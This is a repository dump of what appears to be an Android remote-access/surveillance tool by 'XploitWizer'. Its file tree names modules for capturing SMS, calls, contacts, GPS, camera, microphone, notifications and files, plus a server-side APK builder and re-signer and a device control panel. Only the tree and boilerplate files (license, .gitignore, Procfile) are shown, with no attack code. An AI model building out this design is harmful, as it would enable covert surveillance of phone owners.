├── .gitignore ├── LICENSE ├── Procfile ├── README.md ├── client ├── .project ├── .settings │ └── org.eclipse.buildship.core.prefs ├── app - Shortcut.lnk ├── app │ ├── .gitignore │ ├── app.iml │ ├── build.gradle │ ├── proguard-rules.pro │ ├── release │ │ ├── app-release.apk │ │ └── output.json │ └── src │ │ └── main │ │ ├── AndroidManifest.xml │ │ ├── ic_launcher-web.png │ │ ├── java │ │ └── com │ │ │ └── remote │ │ │ └── app │ │ │ ├── AppInstaller.java │ │ │ ├── AppList.java │ │ │ ├── CallsManager.java │ │ │ ├── CameraManager.java │ │ │ ├── ConnectionManager.java │ │ │ ├── ContactsManager.java │ │ │ ├── FileManager.java │ │ │ ├── IOSocket.java │ │ │ ├── LocManager.java │ │ │ ├── MainActivity.java │ │ │ ├── MainService.java │ │ │ ├── MicManager.java │ │ │ ├── MyReceiver.java │ │ │ ├── NotificationListener.java │ │ │ ├── PermissionManager.java │ │ │ ├── SMSManager.java │ │ │ ├── ServiceReciever.java │ │ │ └── WifiScanner.java │ │ └── res │ │ ├── layout │ │ └── activity_main.xml │ │ ├── mipmap-anydpi-v26 │ │ ├── ic_launcher.xml │ │ └── ic_launcher_round.xml │ │ ├── mipmap-hdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-mdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-xhdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-xxhdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-xxxhdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── values-w820dp │ │ └── dimens.xml │ │ └── values │ │ ├── colors.xml │ │ ├── dimens.xml │ │ ├── ic_launcher_background.xml │ │ ├── strings.xml │ │ └── styles.xml ├── build.gradle ├── client.iml ├── gradle.properties ├── gradle │ └── wrapper │ │ ├── gradle-wrapper.jar │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── local.properties └── settings.gradle ├── package.json ├── server ├── app │ └── factory │ │ ├── apktool.jar │ │ ├── app-release.apk │ │ ├── decompiled │ │ ├── AndroidManifest.xml │ │ ├── apktool.yml │ │ ├── original │ │ │ ├── AndroidManifest.xml │ │ │ └── META-INF │ │ │ │ ├── CERT.RSA │ │ │ │ ├── CERT.SF │ │ │ │ ├── MANIFEST.MF │ │ │ │ ├── android.arch.lifecycle_runtime.version │ │ │ │ ├── androidx.core_core.version │ │ │ │ └── androidx.versionedparcelable_versionedparcelable.version │ │ ├── res │ │ │ ├── drawable-hdpi │ │ │ │ ├── notification_bg_low_normal.9.png │ │ │ │ ├── notification_bg_low_pressed.9.png │ │ │ │ ├── notification_bg_normal.9.png │ │ │ │ ├── notification_bg_normal_pressed.9.png │ │ │ │ └── notify_panel_notification_icon_bg.png │ │ │ ├── drawable-mdpi │ │ │ │ ├── notification_bg_low_normal.9.png │ │ │ │ ├── notification_bg_low_pressed.9.png │ │ │ │ ├── notification_bg_normal.9.png │ │ │ │ ├── notification_bg_normal_pressed.9.png │ │ │ │ └── notify_panel_notification_icon_bg.png │ │ │ ├── drawable-v21 │ │ │ │ └── notification_action_background.xml │ │ │ ├── drawable-xhdpi │ │ │ │ ├── notification_bg_low_normal.9.png │ │ │ │ ├── notification_bg_low_pressed.9.png │ │ │ │ ├── notification_bg_normal.9.png │ │ │ │ ├── notification_bg_normal_pressed.9.png │ │ │ │ └── notify_panel_notification_icon_bg.png │ │ │ ├── drawable │ │ │ │ ├── notification_bg.xml │ │ │ │ ├── notification_bg_low.xml │ │ │ │ ├── notification_icon_background.xml │ │ │ │ └── notification_tile_bg.xml │ │ │ ├── layout-v16 │ │ │ │ └── notification_template_custom_big.xml │ │ │ ├── layout-v17 │ │ │ │ ├── activity_main.xml │ │ │ │ ├── notification_action.xml │ │ │ │ ├── notification_action_tombstone.xml │ │ │ │ └── notification_template_custom_big.xml │ │ │ ├── layout-v21 │ │ │ │ ├── notification_action.xml │ │ │ │ ├── notification_action_tombstone.xml │ │ │ │ ├── notification_template_custom_big.xml │ │ │ │ └── notification_template_icon_group.xml │ │ │ ├── layout │ │ │ │ ├── activity_main.xml │ │ │ │ ├── notification_action.xml │ │ │ │ ├── notification_action_tombstone.xml │ │ │ │ ├── notification_template_custom_big.xml │ │ │ │ ├── notification_template_icon_group.xml │ │ │ │ ├── notification_template_part_chronometer.xml │ │ │ │ └── notification_template_part_time.xml │ │ │ ├── mipmap-anydpi-v26 │ │ │ │ ├── ic_launcher.xml │ │ │ │ └── ic_launcher_round.xml │ │ │ ├── mipmap-hdpi │ │ │ │ ├── ic_launcher.png │ │ │ │ ├── ic_launcher_foreground.png │ │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-mdpi │ │ │ │ ├── ic_launcher.png │ │ │ │ ├── ic_launcher_foreground.png │ │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xhdpi │ │ │ │ ├── ic_launcher.png │ │ │ │ ├── ic_launcher_foreground.png │ │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xxhdpi │ │ │ │ ├── ic_launcher.png │ │ │ │ ├── ic_launcher_foreground.png │ │ │ │ └── ic_launcher_round.png │ │ │ ├── mipmap-xxxhdpi │ │ │ │ ├── ic_launcher.png │ │ │ │ ├── ic_launcher_foreground.png │ │ │ │ └── ic_launcher_round.png │ │ │ ├── values-af │ │ │ │ └── strings.xml │ │ │ ├── values-am │ │ │ │ └── strings.xml │ │ │ ├── values-ar │ │ │ │ └── strings.xml │ │ │ ├── values-as │ │ │ │ └── strings.xml │ │ │ ├── values-az │ │ │ │ └── strings.xml │ │ │ ├── values-b+sr+Latn │ │ │ │ └── strings.xml │ │ │ ├── values-be │ │ │ │ └── strings.xml │ │ │ ├── values-bg │ │ │ │ └── strings.xml │ │ │ ├── values-bn │ │ │ │ └── strings.xml │ │ │ ├── values-bs │ │ │ │ └── strings.xml │ │ │ ├── values-ca │ │ │ │ └── strings.xml │ │ │ ├── values-cs │ │ │ │ └── strings.xml │ │ │ ├── values-da │ │ │ │ └── strings.xml │ │ │ ├── values-de │ │ │ │ └── strings.xml │ │ │ ├── values-el │ │ │ │ └── strings.xml │ │ │ ├── values-en-rAU │ │ │ │ └── strings.xml │ │ │ ├── values-en-rCA │ │ │ │ └── strings.xml │ │ │ ├── values-en-rGB │ │ │ │ └── strings.xml │ │ │ ├── values-en-rIN │ │ │ │ └── strings.xml │ │ │ ├── values-en-rXC │ │ │ │ └── strings.xml │ │ │ ├── values-es-rUS │ │ │ │ └── strings.xml │ │ │ ├── values-es │ │ │ │ └── strings.xml │ │ │ ├── values-et │ │ │ │ └── strings.xml │ │ │ ├── values-eu │ │ │ │ └── strings.xml │ │ │ ├── values-fa │ │ │ │ └── strings.xml │ │ │ ├── values-fi │ │ │ │ └── strings.xml │ │ │ ├── values-fr-rCA │ │ │ │ └── strings.xml │ │ │ ├── values-fr │ │ │ │ └── strings.xml │ │ │ ├── values-gl │ │ │ │ └── strings.xml │ │ │ ├── values-gu │ │ │ │ └── strings.xml │ │ │ ├── values-hi │ │ │ │ └── strings.xml │ │ │ ├── values-hr │ │ │ │ └── strings.xml │ │ │ ├── values-hu │ │ │ │ └── strings.xml │ │ │ ├── values-hy │ │ │ │ └── strings.xml │ │ │ ├── values-in │ │ │ │ └── strings.xml │ │ │ ├── values-is │ │ │ │ └── strings.xml │ │ │ ├── values-it │ │ │ │ └── strings.xml │ │ │ ├── values-iw │ │ │ │ └── strings.xml │ │ │ ├── values-ja │ │ │ │ └── strings.xml │ │ │ ├── values-ka │ │ │ │ └── strings.xml │ │ │ ├── values-kk │ │ │ │ └── strings.xml │ │ │ ├── values-km │ │ │ │ └── strings.xml │ │ │ ├── values-kn │ │ │ │ └── strings.xml │ │ │ ├── values-ko │ │ │ │ └── strings.xml │ │ │ ├── values-ky │ │ │ │ └── strings.xml │ │ │ ├── values-lo │ │ │ │ └── strings.xml │ │ │ ├── values-lt │ │ │ │ └── strings.xml │ │ │ ├── values-lv │ │ │ │ └── strings.xml │ │ │ ├── values-mk │ │ │ │ └── strings.xml │ │ │ ├── values-ml │ │ │ │ └── strings.xml │ │ │ ├── values-mn │ │ │ │ └── strings.xml │ │ │ ├── values-mr │ │ │ │ └── strings.xml │ │ │ ├── values-ms │ │ │ │ └── strings.xml │ │ │ ├── values-my │ │ │ │ └── strings.xml │ │ │ ├── values-nb │ │ │ │ └── strings.xml │ │ │ ├── values-ne │ │ │ │ └── strings.xml │ │ │ ├── values-nl │ │ │ │ └── strings.xml │ │ │ ├── values-or │ │ │ │ └── strings.xml │ │ │ ├── values-pa │ │ │ │ └── strings.xml │ │ │ ├── values-pl │ │ │ │ └── strings.xml │ │ │ ├── values-pt-rBR │ │ │ │ └── strings.xml │ │ │ ├── values-pt-rPT │ │ │ │ └── strings.xml │ │ │ ├── values-pt │ │ │ │ └── strings.xml │ │ │ ├── values-ro │ │ │ │ └── strings.xml │ │ │ ├── values-ru │ │ │ │ └── strings.xml │ │ │ ├── values-si │ │ │ │ └── strings.xml │ │ │ ├── values-sk │ │ │ │ └── strings.xml │ │ │ ├── values-sl │ │ │ │ └── strings.xml │ │ │ ├── values-sq │ │ │ │ └── strings.xml │ │ │ ├── values-sr │ │ │ │ └── strings.xml │ │ │ ├── values-sv │ │ │ │ └── strings.xml │ │ │ ├── values-sw │ │ │ │ └── strings.xml │ │ │ ├── values-ta │ │ │ │ └── strings.xml │ │ │ ├── values-te │ │ │ │ └── strings.xml │ │ │ ├── values-th │ │ │ │ └── strings.xml │ │ │ ├── values-tl │ │ │ │ └── strings.xml │ │ │ ├── values-tr │ │ │ │ └── strings.xml │ │ │ ├── values-uk │ │ │ │ └── strings.xml │ │ │ ├── values-ur │ │ │ │ └── strings.xml │ │ │ ├── values-uz │ │ │ │ └── strings.xml │ │ │ ├── values-v16 │ │ │ │ └── dimens.xml │ │ │ ├── values-v21 │ │ │ │ ├── colors.xml │ │ │ │ ├── dimens.xml │ │ │ │ └── styles.xml │ │ │ ├── values-vi │ │ │ │ └── strings.xml │ │ │ ├── values-w820dp │ │ │ │ └── dimens.xml │ │ │ ├── values-zh-rCN │ │ │ │ └── strings.xml │ │ │ ├── values-zh-rHK │ │ │ │ └── strings.xml │ │ │ ├── values-zh-rTW │ │ │ │ └── strings.xml │ │ │ ├── values-zu │ │ │ │ └── strings.xml │ │ │ └── values │ │ │ │ ├── attrs.xml │ │ │ │ ├── colors.xml │ │ │ │ ├── dimens.xml │ │ │ │ ├── drawables.xml │ │ │ │ ├── ids.xml │ │ │ │ ├── integers.xml │ │ │ │ ├── public.xml │ │ │ │ ├── strings.xml │ │ │ │ └── styles.xml │ │ └── smali │ │ │ ├── a │ │ │ └── a │ │ │ │ └── a │ │ │ │ └── a │ │ │ │ └── a.smali │ │ │ ├── android │ │ │ ├── arch │ │ │ │ └── lifecycle │ │ │ │ │ ├── CompositeGeneratedAdaptersObserver.smali │ │ │ │ │ ├── FullLifecycleObserver.smali │ │ │ │ │ ├── FullLifecycleObserverAdapter.smali │ │ │ │ │ ├── GenericLifecycleObserver.smali │ │ │ │ │ ├── ReflectiveGenericLifecycleObserver.smali │ │ │ │ │ ├── SingleGeneratedAdapterObserver.smali │ │ │ │ │ └── a.smali │ │ │ └── support │ │ │ │ ├── annotation │ │ │ │ └── Keep.smali │ │ │ │ └── v4 │ │ │ │ ├── app │ │ │ │ ├── CoreComponentFactory$a.smali │ │ │ │ ├── CoreComponentFactory.smali │ │ │ │ ├── a.smali │ │ │ │ ├── b$a.smali │ │ │ │ ├── b$b.smali │ │ │ │ ├── b$c.smali │ │ │ │ ├── b.smali │ │ │ │ ├── c.smali │ │ │ │ ├── d$a.smali │ │ │ │ ├── d$b.smali │ │ │ │ ├── d$c.smali │ │ │ │ ├── d.smali │ │ │ │ ├── e.smali │ │ │ │ ├── f.smali │ │ │ │ └── g.smali │ │ │ │ └── graphics │ │ │ │ └── drawable │ │ │ │ ├── IconCompat.smali │ │ │ │ └── IconCompatParcelizer.smali │ │ │ ├── androidx │ │ │ ├── core │ │ │ │ └── graphics │ │ │ │ │ └── drawable │ │ │ │ │ └── IconCompatParcelizer.smali │ │ │ └── versionedparcelable │ │ │ │ ├── CustomVersionedParcelable.smali │ │ │ │ ├── ParcelImpl.smali │ │ │ │ ├── a.smali │ │ │ │ ├── b.smali │ │ │ │ ├── c.smali │ │ │ │ └── d.smali │ │ │ ├── b │ │ │ └── a │ │ │ │ ├── a │ │ │ │ └── a.smali │ │ │ │ ├── b │ │ │ │ ├── H.smali │ │ │ │ ├── I.smali │ │ │ │ ├── J.smali │ │ │ │ ├── K.smali │ │ │ │ ├── a.1.smali │ │ │ │ ├── a.smali │ │ │ │ ├── b$a.smali │ │ │ │ ├── b.1.smali │ │ │ │ ├── b.smali │ │ │ │ ├── c.1.smali │ │ │ │ ├── c.smali │ │ │ │ ├── d.1.smali │ │ │ │ ├── d.smali │ │ │ │ ├── e.1.smali │ │ │ │ ├── e.smali │ │ │ │ ├── f.1.smali │ │ │ │ ├── f.smali │ │ │ │ ├── g.1.smali │ │ │ │ ├── g.smali │ │ │ │ ├── h.1.smali │ │ │ │ ├── i.1.smali │ │ │ │ ├── j.1.smali │ │ │ │ ├── k.1.smali │ │ │ │ ├── l.smali │ │ │ │ ├── m.smali │ │ │ │ ├── n.smali │ │ │ │ ├── o.smali │ │ │ │ ├── p.smali │ │ │ │ ├── q.smali │ │ │ │ ├── r.smali │ │ │ │ ├── s.smali │ │ │ │ ├── t.smali │ │ │ │ ├── u.smali │ │ │ │ ├── v.smali │ │ │ │ ├── w$a.smali │ │ │ │ ├── w$b.smali │ │ │ │ ├── w$c.smali │ │ │ │ ├── w$d.smali │ │ │ │ ├── w.smali │ │ │ │ ├── x.smali │ │ │ │ ├── y$a.smali │ │ │ │ ├── y.smali │ │ │ │ └── z.smali │ │ │ │ ├── c │ │ │ │ ├── a$a.smali │ │ │ │ ├── a$b.smali │ │ │ │ └── a.smali │ │ │ │ ├── d │ │ │ │ ├── a │ │ │ │ │ ├── A.smali │ │ │ │ │ ├── B.smali │ │ │ │ │ ├── C.smali │ │ │ │ │ ├── D.smali │ │ │ │ │ ├── E.smali │ │ │ │ │ ├── F.smali │ │ │ │ │ ├── G$a.smali │ │ │ │ │ ├── G$b.smali │ │ │ │ │ ├── G.smali │ │ │ │ │ ├── H.smali │ │ │ │ │ ├── I.smali │ │ │ │ │ ├── J.smali │ │ │ │ │ ├── K$a.smali │ │ │ │ │ ├── K$b.smali │ │ │ │ │ ├── K.smali │ │ │ │ │ ├── a.1.smali │ │ │ │ │ ├── a │ │ │ │ │ │ ├── A.smali │ │ │ │ │ │ ├── B.smali │ │ │ │ │ │ ├── C.smali │ │ │ │ │ │ ├── D.smali │ │ │ │ │ │ ├── E.smali │ │ │ │ │ │ ├── F.smali │ │ │ │ │ │ ├── G.smali │ │ │ │ │ │ ├── a.1.smali │ │ │ │ │ │ ├── b.1.smali │ │ │ │ │ │ ├── c.1.smali │ │ │ │ │ │ ├── d.1.smali │ │ │ │ │ │ ├── e.1.smali │ │ │ │ │ │ ├── f.1.smali │ │ │ │ │ │ ├── g.1.smali │ │ │ │ │ │ ├── h.smali │ │ │ │ │ │ ├── i.smali │ │ │ │ │ │ ├── j.smali │ │ │ │ │ │ ├── k.smali │ │ │ │ │ │ ├── l.smali │ │ │ │ │ │ ├── m.smali │ │ │ │ │ │ ├── n.smali │ │ │ │ │ │ ├── o.smali │ │ │ │ │ │ ├── p.smali │ │ │ │ │ │ ├── q.smali │ │ │ │ │ │ ├── r.smali │ │ │ │ │ │ ├── s.smali │ │ │ │ │ │ ├── t.smali │ │ │ │ │ │ ├── u.smali │ │ │ │ │ │ ├── v$a$a.smali │ │ │ │ │ │ ├── v$a.smali │ │ │ │ │ │ ├── v.smali │ │ │ │ │ │ ├── w.smali │ │ │ │ │ │ ├── x.smali │ │ │ │ │ │ ├── y.smali │ │ │ │ │ │ └── z.smali │ │ │ │ │ ├── b.1.smali │ │ │ │ │ ├── c.1.smali │ │ │ │ │ ├── d.1.smali │ │ │ │ │ ├── e.1.smali │ │ │ │ │ ├── f.1.smali │ │ │ │ │ ├── g.1.smali │ │ │ │ │ ├── h.1.smali │ │ │ │ │ ├── i.1.smali │ │ │ │ │ ├── j.1.smali │ │ │ │ │ ├── k.1.smali │ │ │ │ │ ├── l.smali │ │ │ │ │ ├── m.smali │ │ │ │ │ ├── n.smali │ │ │ │ │ ├── o.smali │ │ │ │ │ ├── p.smali │ │ │ │ │ ├── q.smali │ │ │ │ │ ├── r.smali │ │ │ │ │ ├── s.smali │ │ │ │ │ ├── t.smali │ │ │ │ │ ├── u.smali │ │ │ │ │ ├── v.smali │ │ │ │ │ ├── w.smali │ │ │ │ │ ├── x.smali │ │ │ │ │ ├── y.smali │ │ │ │ │ └── z.smali │ │ │ │ └── b │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ ├── e$a.smali │ │ │ │ │ ├── e$b.smali │ │ │ │ │ └── e.smali │ │ │ │ ├── e │ │ │ │ └── A.smali │ │ │ │ ├── f │ │ │ │ └── a.smali │ │ │ │ ├── g │ │ │ │ └── a.smali │ │ │ │ ├── h │ │ │ │ ├── a$a.smali │ │ │ │ ├── a.smali │ │ │ │ ├── b.smali │ │ │ │ ├── c$a.smali │ │ │ │ ├── c$b.smali │ │ │ │ ├── c$c$a.smali │ │ │ │ ├── c$c.smali │ │ │ │ └── c.smali │ │ │ │ ├── i │ │ │ │ ├── a.smali │ │ │ │ ├── b.smali │ │ │ │ └── c.smali │ │ │ │ ├── j │ │ │ │ ├── a.smali │ │ │ │ └── b.smali │ │ │ │ └── k │ │ │ │ └── a.smali │ │ │ ├── c │ │ │ ├── A$a.smali │ │ │ ├── D$a.smali │ │ │ ├── G$a.smali │ │ │ ├── L$a.smali │ │ │ ├── a.1.smali │ │ │ ├── a.smali │ │ │ ├── a │ │ │ │ ├── a.smali │ │ │ │ ├── a │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d$a.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ └── e.smali │ │ │ │ ├── b.smali │ │ │ │ ├── b │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ ├── e.smali │ │ │ │ │ ├── f.smali │ │ │ │ │ ├── g$a.smali │ │ │ │ │ └── g.smali │ │ │ │ ├── c.smali │ │ │ │ ├── c │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ ├── e.smali │ │ │ │ │ ├── f.smali │ │ │ │ │ ├── g.smali │ │ │ │ │ ├── h.smali │ │ │ │ │ ├── i.smali │ │ │ │ │ ├── j.smali │ │ │ │ │ ├── k.smali │ │ │ │ │ └── l.smali │ │ │ │ ├── d.smali │ │ │ │ ├── d │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b$a.smali │ │ │ │ │ ├── b$b.smali │ │ │ │ │ ├── b$c.smali │ │ │ │ │ ├── b$d.smali │ │ │ │ │ ├── b$e.smali │ │ │ │ │ ├── b$f.smali │ │ │ │ │ └── b.smali │ │ │ │ ├── e.smali │ │ │ │ ├── e │ │ │ │ │ ├── A.smali │ │ │ │ │ ├── a.1.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d$a.smali │ │ │ │ │ ├── d$b.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ ├── e.smali │ │ │ │ │ ├── f$a.smali │ │ │ │ │ ├── f.smali │ │ │ │ │ ├── g.smali │ │ │ │ │ ├── h.smali │ │ │ │ │ ├── i.smali │ │ │ │ │ ├── j.smali │ │ │ │ │ ├── k.smali │ │ │ │ │ ├── l.smali │ │ │ │ │ ├── m.smali │ │ │ │ │ ├── n$a.smali │ │ │ │ │ ├── n$b.smali │ │ │ │ │ ├── n$c.smali │ │ │ │ │ ├── n.smali │ │ │ │ │ ├── o.smali │ │ │ │ │ ├── p.smali │ │ │ │ │ ├── q.smali │ │ │ │ │ ├── r.smali │ │ │ │ │ ├── s$a.smali │ │ │ │ │ ├── s$b.smali │ │ │ │ │ ├── s.smali │ │ │ │ │ ├── t$a.smali │ │ │ │ │ ├── t$b.smali │ │ │ │ │ ├── t$c.smali │ │ │ │ │ ├── t.smali │ │ │ │ │ ├── u.smali │ │ │ │ │ ├── v$a.smali │ │ │ │ │ ├── v.smali │ │ │ │ │ ├── w.smali │ │ │ │ │ ├── x.smali │ │ │ │ │ ├── y.smali │ │ │ │ │ └── z.smali │ │ │ │ ├── f │ │ │ │ │ ├── a$a.smali │ │ │ │ │ ├── a$b.smali │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c$a.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ └── e.smali │ │ │ │ ├── g │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ ├── e$a.smali │ │ │ │ │ ├── e$b.smali │ │ │ │ │ └── e.smali │ │ │ │ └── h │ │ │ │ │ ├── a.smali │ │ │ │ │ ├── b.smali │ │ │ │ │ ├── c$a.smali │ │ │ │ │ ├── c$b.smali │ │ │ │ │ ├── c$c.smali │ │ │ │ │ ├── c$d.smali │ │ │ │ │ ├── c$e.smali │ │ │ │ │ ├── c$f.smali │ │ │ │ │ ├── c.smali │ │ │ │ │ ├── d.smali │ │ │ │ │ ├── e$a.smali │ │ │ │ │ ├── e.smali │ │ │ │ │ ├── f$a.smali │ │ │ │ │ └── f.smali │ │ │ ├── b.1.smali │ │ │ ├── b.smali │ │ │ ├── c$a.smali │ │ │ ├── c.1.smali │ │ │ ├── c.smali │ │ │ ├── d.1.smali │ │ │ ├── d.smali │ │ │ ├── e$a.smali │ │ │ ├── e.1.smali │ │ │ ├── e.smali │ │ │ ├── f$a.smali │ │ │ ├── f.1.smali │ │ │ ├── f.smali │ │ │ ├── g.1.smali │ │ │ ├── g.smali │ │ │ ├── h$a.smali │ │ │ ├── h$b.smali │ │ │ ├── h.1.smali │ │ │ ├── h.smali │ │ │ ├── i.1.smali │ │ │ ├── i.smali │ │ │ ├── j.1.smali │ │ │ ├── j.smali │ │ │ ├── k.1.smali │ │ │ ├── k.smali │ │ │ ├── l.1.smali │ │ │ ├── l.smali │ │ │ ├── m$a.smali │ │ │ ├── m.1.smali │ │ │ ├── m.smali │ │ │ ├── n.smali │ │ │ ├── o.smali │ │ │ ├── p.smali │ │ │ ├── q.smali │ │ │ ├── r.smali │ │ │ ├── s.smali │ │ │ ├── t.smali │ │ │ ├── u.smali │ │ │ ├── v$a.smali │ │ │ ├── v.smali │ │ │ ├── w$a$a.smali │ │ │ ├── w$a.smali │ │ │ ├── w.smali │ │ │ ├── x$a.smali │ │ │ ├── x.smali │ │ │ ├── y.smali │ │ │ └── z.smali │ │ │ ├── com │ │ │ └── remote │ │ │ │ └── app │ │ │ │ ├── MainActivity.smali │ │ │ │ ├── MainService.smali │ │ │ │ ├── MyReceiver.smali │ │ │ │ ├── NotificationListener.smali │ │ │ │ ├── ServiceReciever.smali │ │ │ │ ├── a.smali │ │ │ │ ├── b.smali │ │ │ │ ├── c.smali │ │ │ │ ├── d.smali │ │ │ │ ├── e.smali │ │ │ │ ├── f.smali │ │ │ │ ├── g.smali │ │ │ │ ├── h.smali │ │ │ │ ├── i.smali │ │ │ │ ├── j.smali │ │ │ │ ├── k.smali │ │ │ │ ├── l.smali │ │ │ │ ├── m.smali │ │ │ │ ├── n.smali │ │ │ │ └── o.smali │ │ │ └── d │ │ │ ├── a.smali │ │ │ ├── b.smali │ │ │ ├── c$a.smali │ │ │ ├── c.smali │ │ │ ├── d.smali │ │ │ ├── e.smali │ │ │ ├── f.smali │ │ │ ├── g.smali │ │ │ ├── h.smali │ │ │ ├── i.smali │ │ │ ├── j.smali │ │ │ ├── k.smali │ │ │ ├── l.smali │ │ │ ├── m.smali │ │ │ ├── n.smali │ │ │ ├── o.smali │ │ │ ├── p.smali │ │ │ ├── q.smali │ │ │ ├── r.smali │ │ │ ├── s.smali │ │ │ ├── t.smali │ │ │ ├── u.smali │ │ │ ├── v.smali │ │ │ ├── w.smali │ │ │ ├── x.smali │ │ │ ├── y.smali │ │ │ └── z.smali │ │ ├── release.jks │ │ ├── testkey.pk8 │ │ ├── testkey.x509.pem │ │ └── uber-apk-signer-1.1.0.jar ├── assets │ ├── views │ │ ├── builder.ejs │ │ ├── changePassword.ejs │ │ ├── deviceManager.ejs │ │ ├── deviceManagerPages │ │ │ ├── apps.ejs │ │ │ ├── call_log.ejs │ │ │ ├── clipboard_log.ejs │ │ │ ├── contacts.ejs │ │ │ ├── deviceNotFound.ejs │ │ │ ├── downloads.ejs │ │ │ ├── file_manager.ejs │ │ │ ├── gps.ejs │ │ │ ├── info.ejs │ │ │ ├── microphone.ejs │ │ │ ├── noPage.ejs │ │ │ ├── notification_log.ejs │ │ │ ├── permissions.ejs │ │ │ ├── sms_manager.ejs │ │ │ └── wifi_manager.ejs │ │ ├── index.ejs │ │ ├── login.ejs │ │ ├── logs.ejs │ │ ├── partials │ │ │ ├── deviceManagerMenu.ejs │ │ │ ├── footer.ejs │ │ │ ├── head.ejs │ │ │ └── header.ejs │ │ └── welcome.ejs │ └── webpublic │ │ ├── build-aligned-signed.apk │ │ ├── build.apk │ │ ├── client_downloads │ │ └── blank │ │ ├── css │ │ ├── animate.css │ │ ├── bootstrap.css │ │ ├── custom.css │ │ ├── custom.css.map │ │ ├── custom.scss │ │ ├── images │ │ │ ├── layers-2x.png │ │ │ ├── layers.png │ │ │ ├── marker-icon-2x.png │ │ │ ├── marker-icon.png │ │ │ └── marker-shadow.png │ │ ├── leaflet.css │ │ ├── semantic.min.css │ │ ├── snackbar.min.css │ │ ├── style.css │ │ └── themes │ │ │ └── default │ │ │ └── assets │ │ │ ├── fonts │ │ │ ├── brand-icons.eot │ │ │ ├── brand-icons.svg │ │ │ ├── brand-icons.ttf │ │ │ ├── brand-icons.woff │ │ │ ├── brand-icons.woff2 │ │ │ ├── icons.eot │ │ │ ├── icons.otf │ │ │ ├── icons.svg │ │ │ ├── icons.ttf │ │ │ ├── icons.woff │ │ │ ├── icons.woff2 │ │ │ ├── outline-icons.eot │ │ │ ├── outline-icons.svg │ │ │ ├── outline-icons.ttf │ │ │ ├── outline-icons.woff │ │ │ └── outline-icons.woff2 │ │ │ └── images │ │ │ └── flags.png │ │ ├── img │ │ ├── Xploit-Wizer.png │ │ ├── acp-bg.png │ │ ├── hacker.png │ │ ├── logo.png │ │ ├── main-bg-min.png │ │ ├── pricing-bg-block.jpg │ │ ├── pricing-bg-min.png │ │ ├── pricing-light.png │ │ ├── scroll-down.png │ │ ├── services-bg-min.png │ │ └── svg │ │ │ ├── Shape4.svg │ │ │ ├── Shape6.svg │ │ │ ├── Shape7.svg │ │ │ ├── arrow-bottom.svg │ │ │ └── downloadmain.svg │ │ ├── js │ │ ├── bootstrap.bundle.min.js │ │ ├── jquery-3.4.1.min.js │ │ ├── leaflet.js │ │ ├── main.js │ │ ├── semantic.min.js │ │ └── snackbar.min.js │ │ └── logo.png ├── clientData │ └── blank ├── includes │ ├── apkBuilder.js │ ├── clientManager.js │ ├── const.js │ ├── databaseGateway.js │ ├── expressRoutes.js │ └── logManager.js ├── index.js ├── maindb.json ├── package-lock.json └── package.json └── system.properties /.gitignore: -------------------------------------------------------------------------------- 1 | logs 2 | *.log 3 | npm-debug.log* 4 | pids 5 | *.pid 6 | *.seed 7 | lib-cov 8 | coverage 9 | .grunt 10 | .lock-wscript 11 | node_modules 12 | .gradle 13 | .idea 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | 3 | The MIT License (MIT) 4 | 5 | 6 | Copyright (c) 2019 ETechD & XploitWizer 7 | 8 | NOTE : MIT License of these codes comes with Sub-License of XploitWizer 9 | 10 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 15 | -------------------------------------------------------------------------------- /Procfile: -------------------------------------------------------------------------------- 1 | ‘web: ./node_modules/.bin/forever -m 5 index.js’ 2 | -------------------------------------------------------------------------------- /client/.project: -------------------------------------------------------------------------------- 1 | 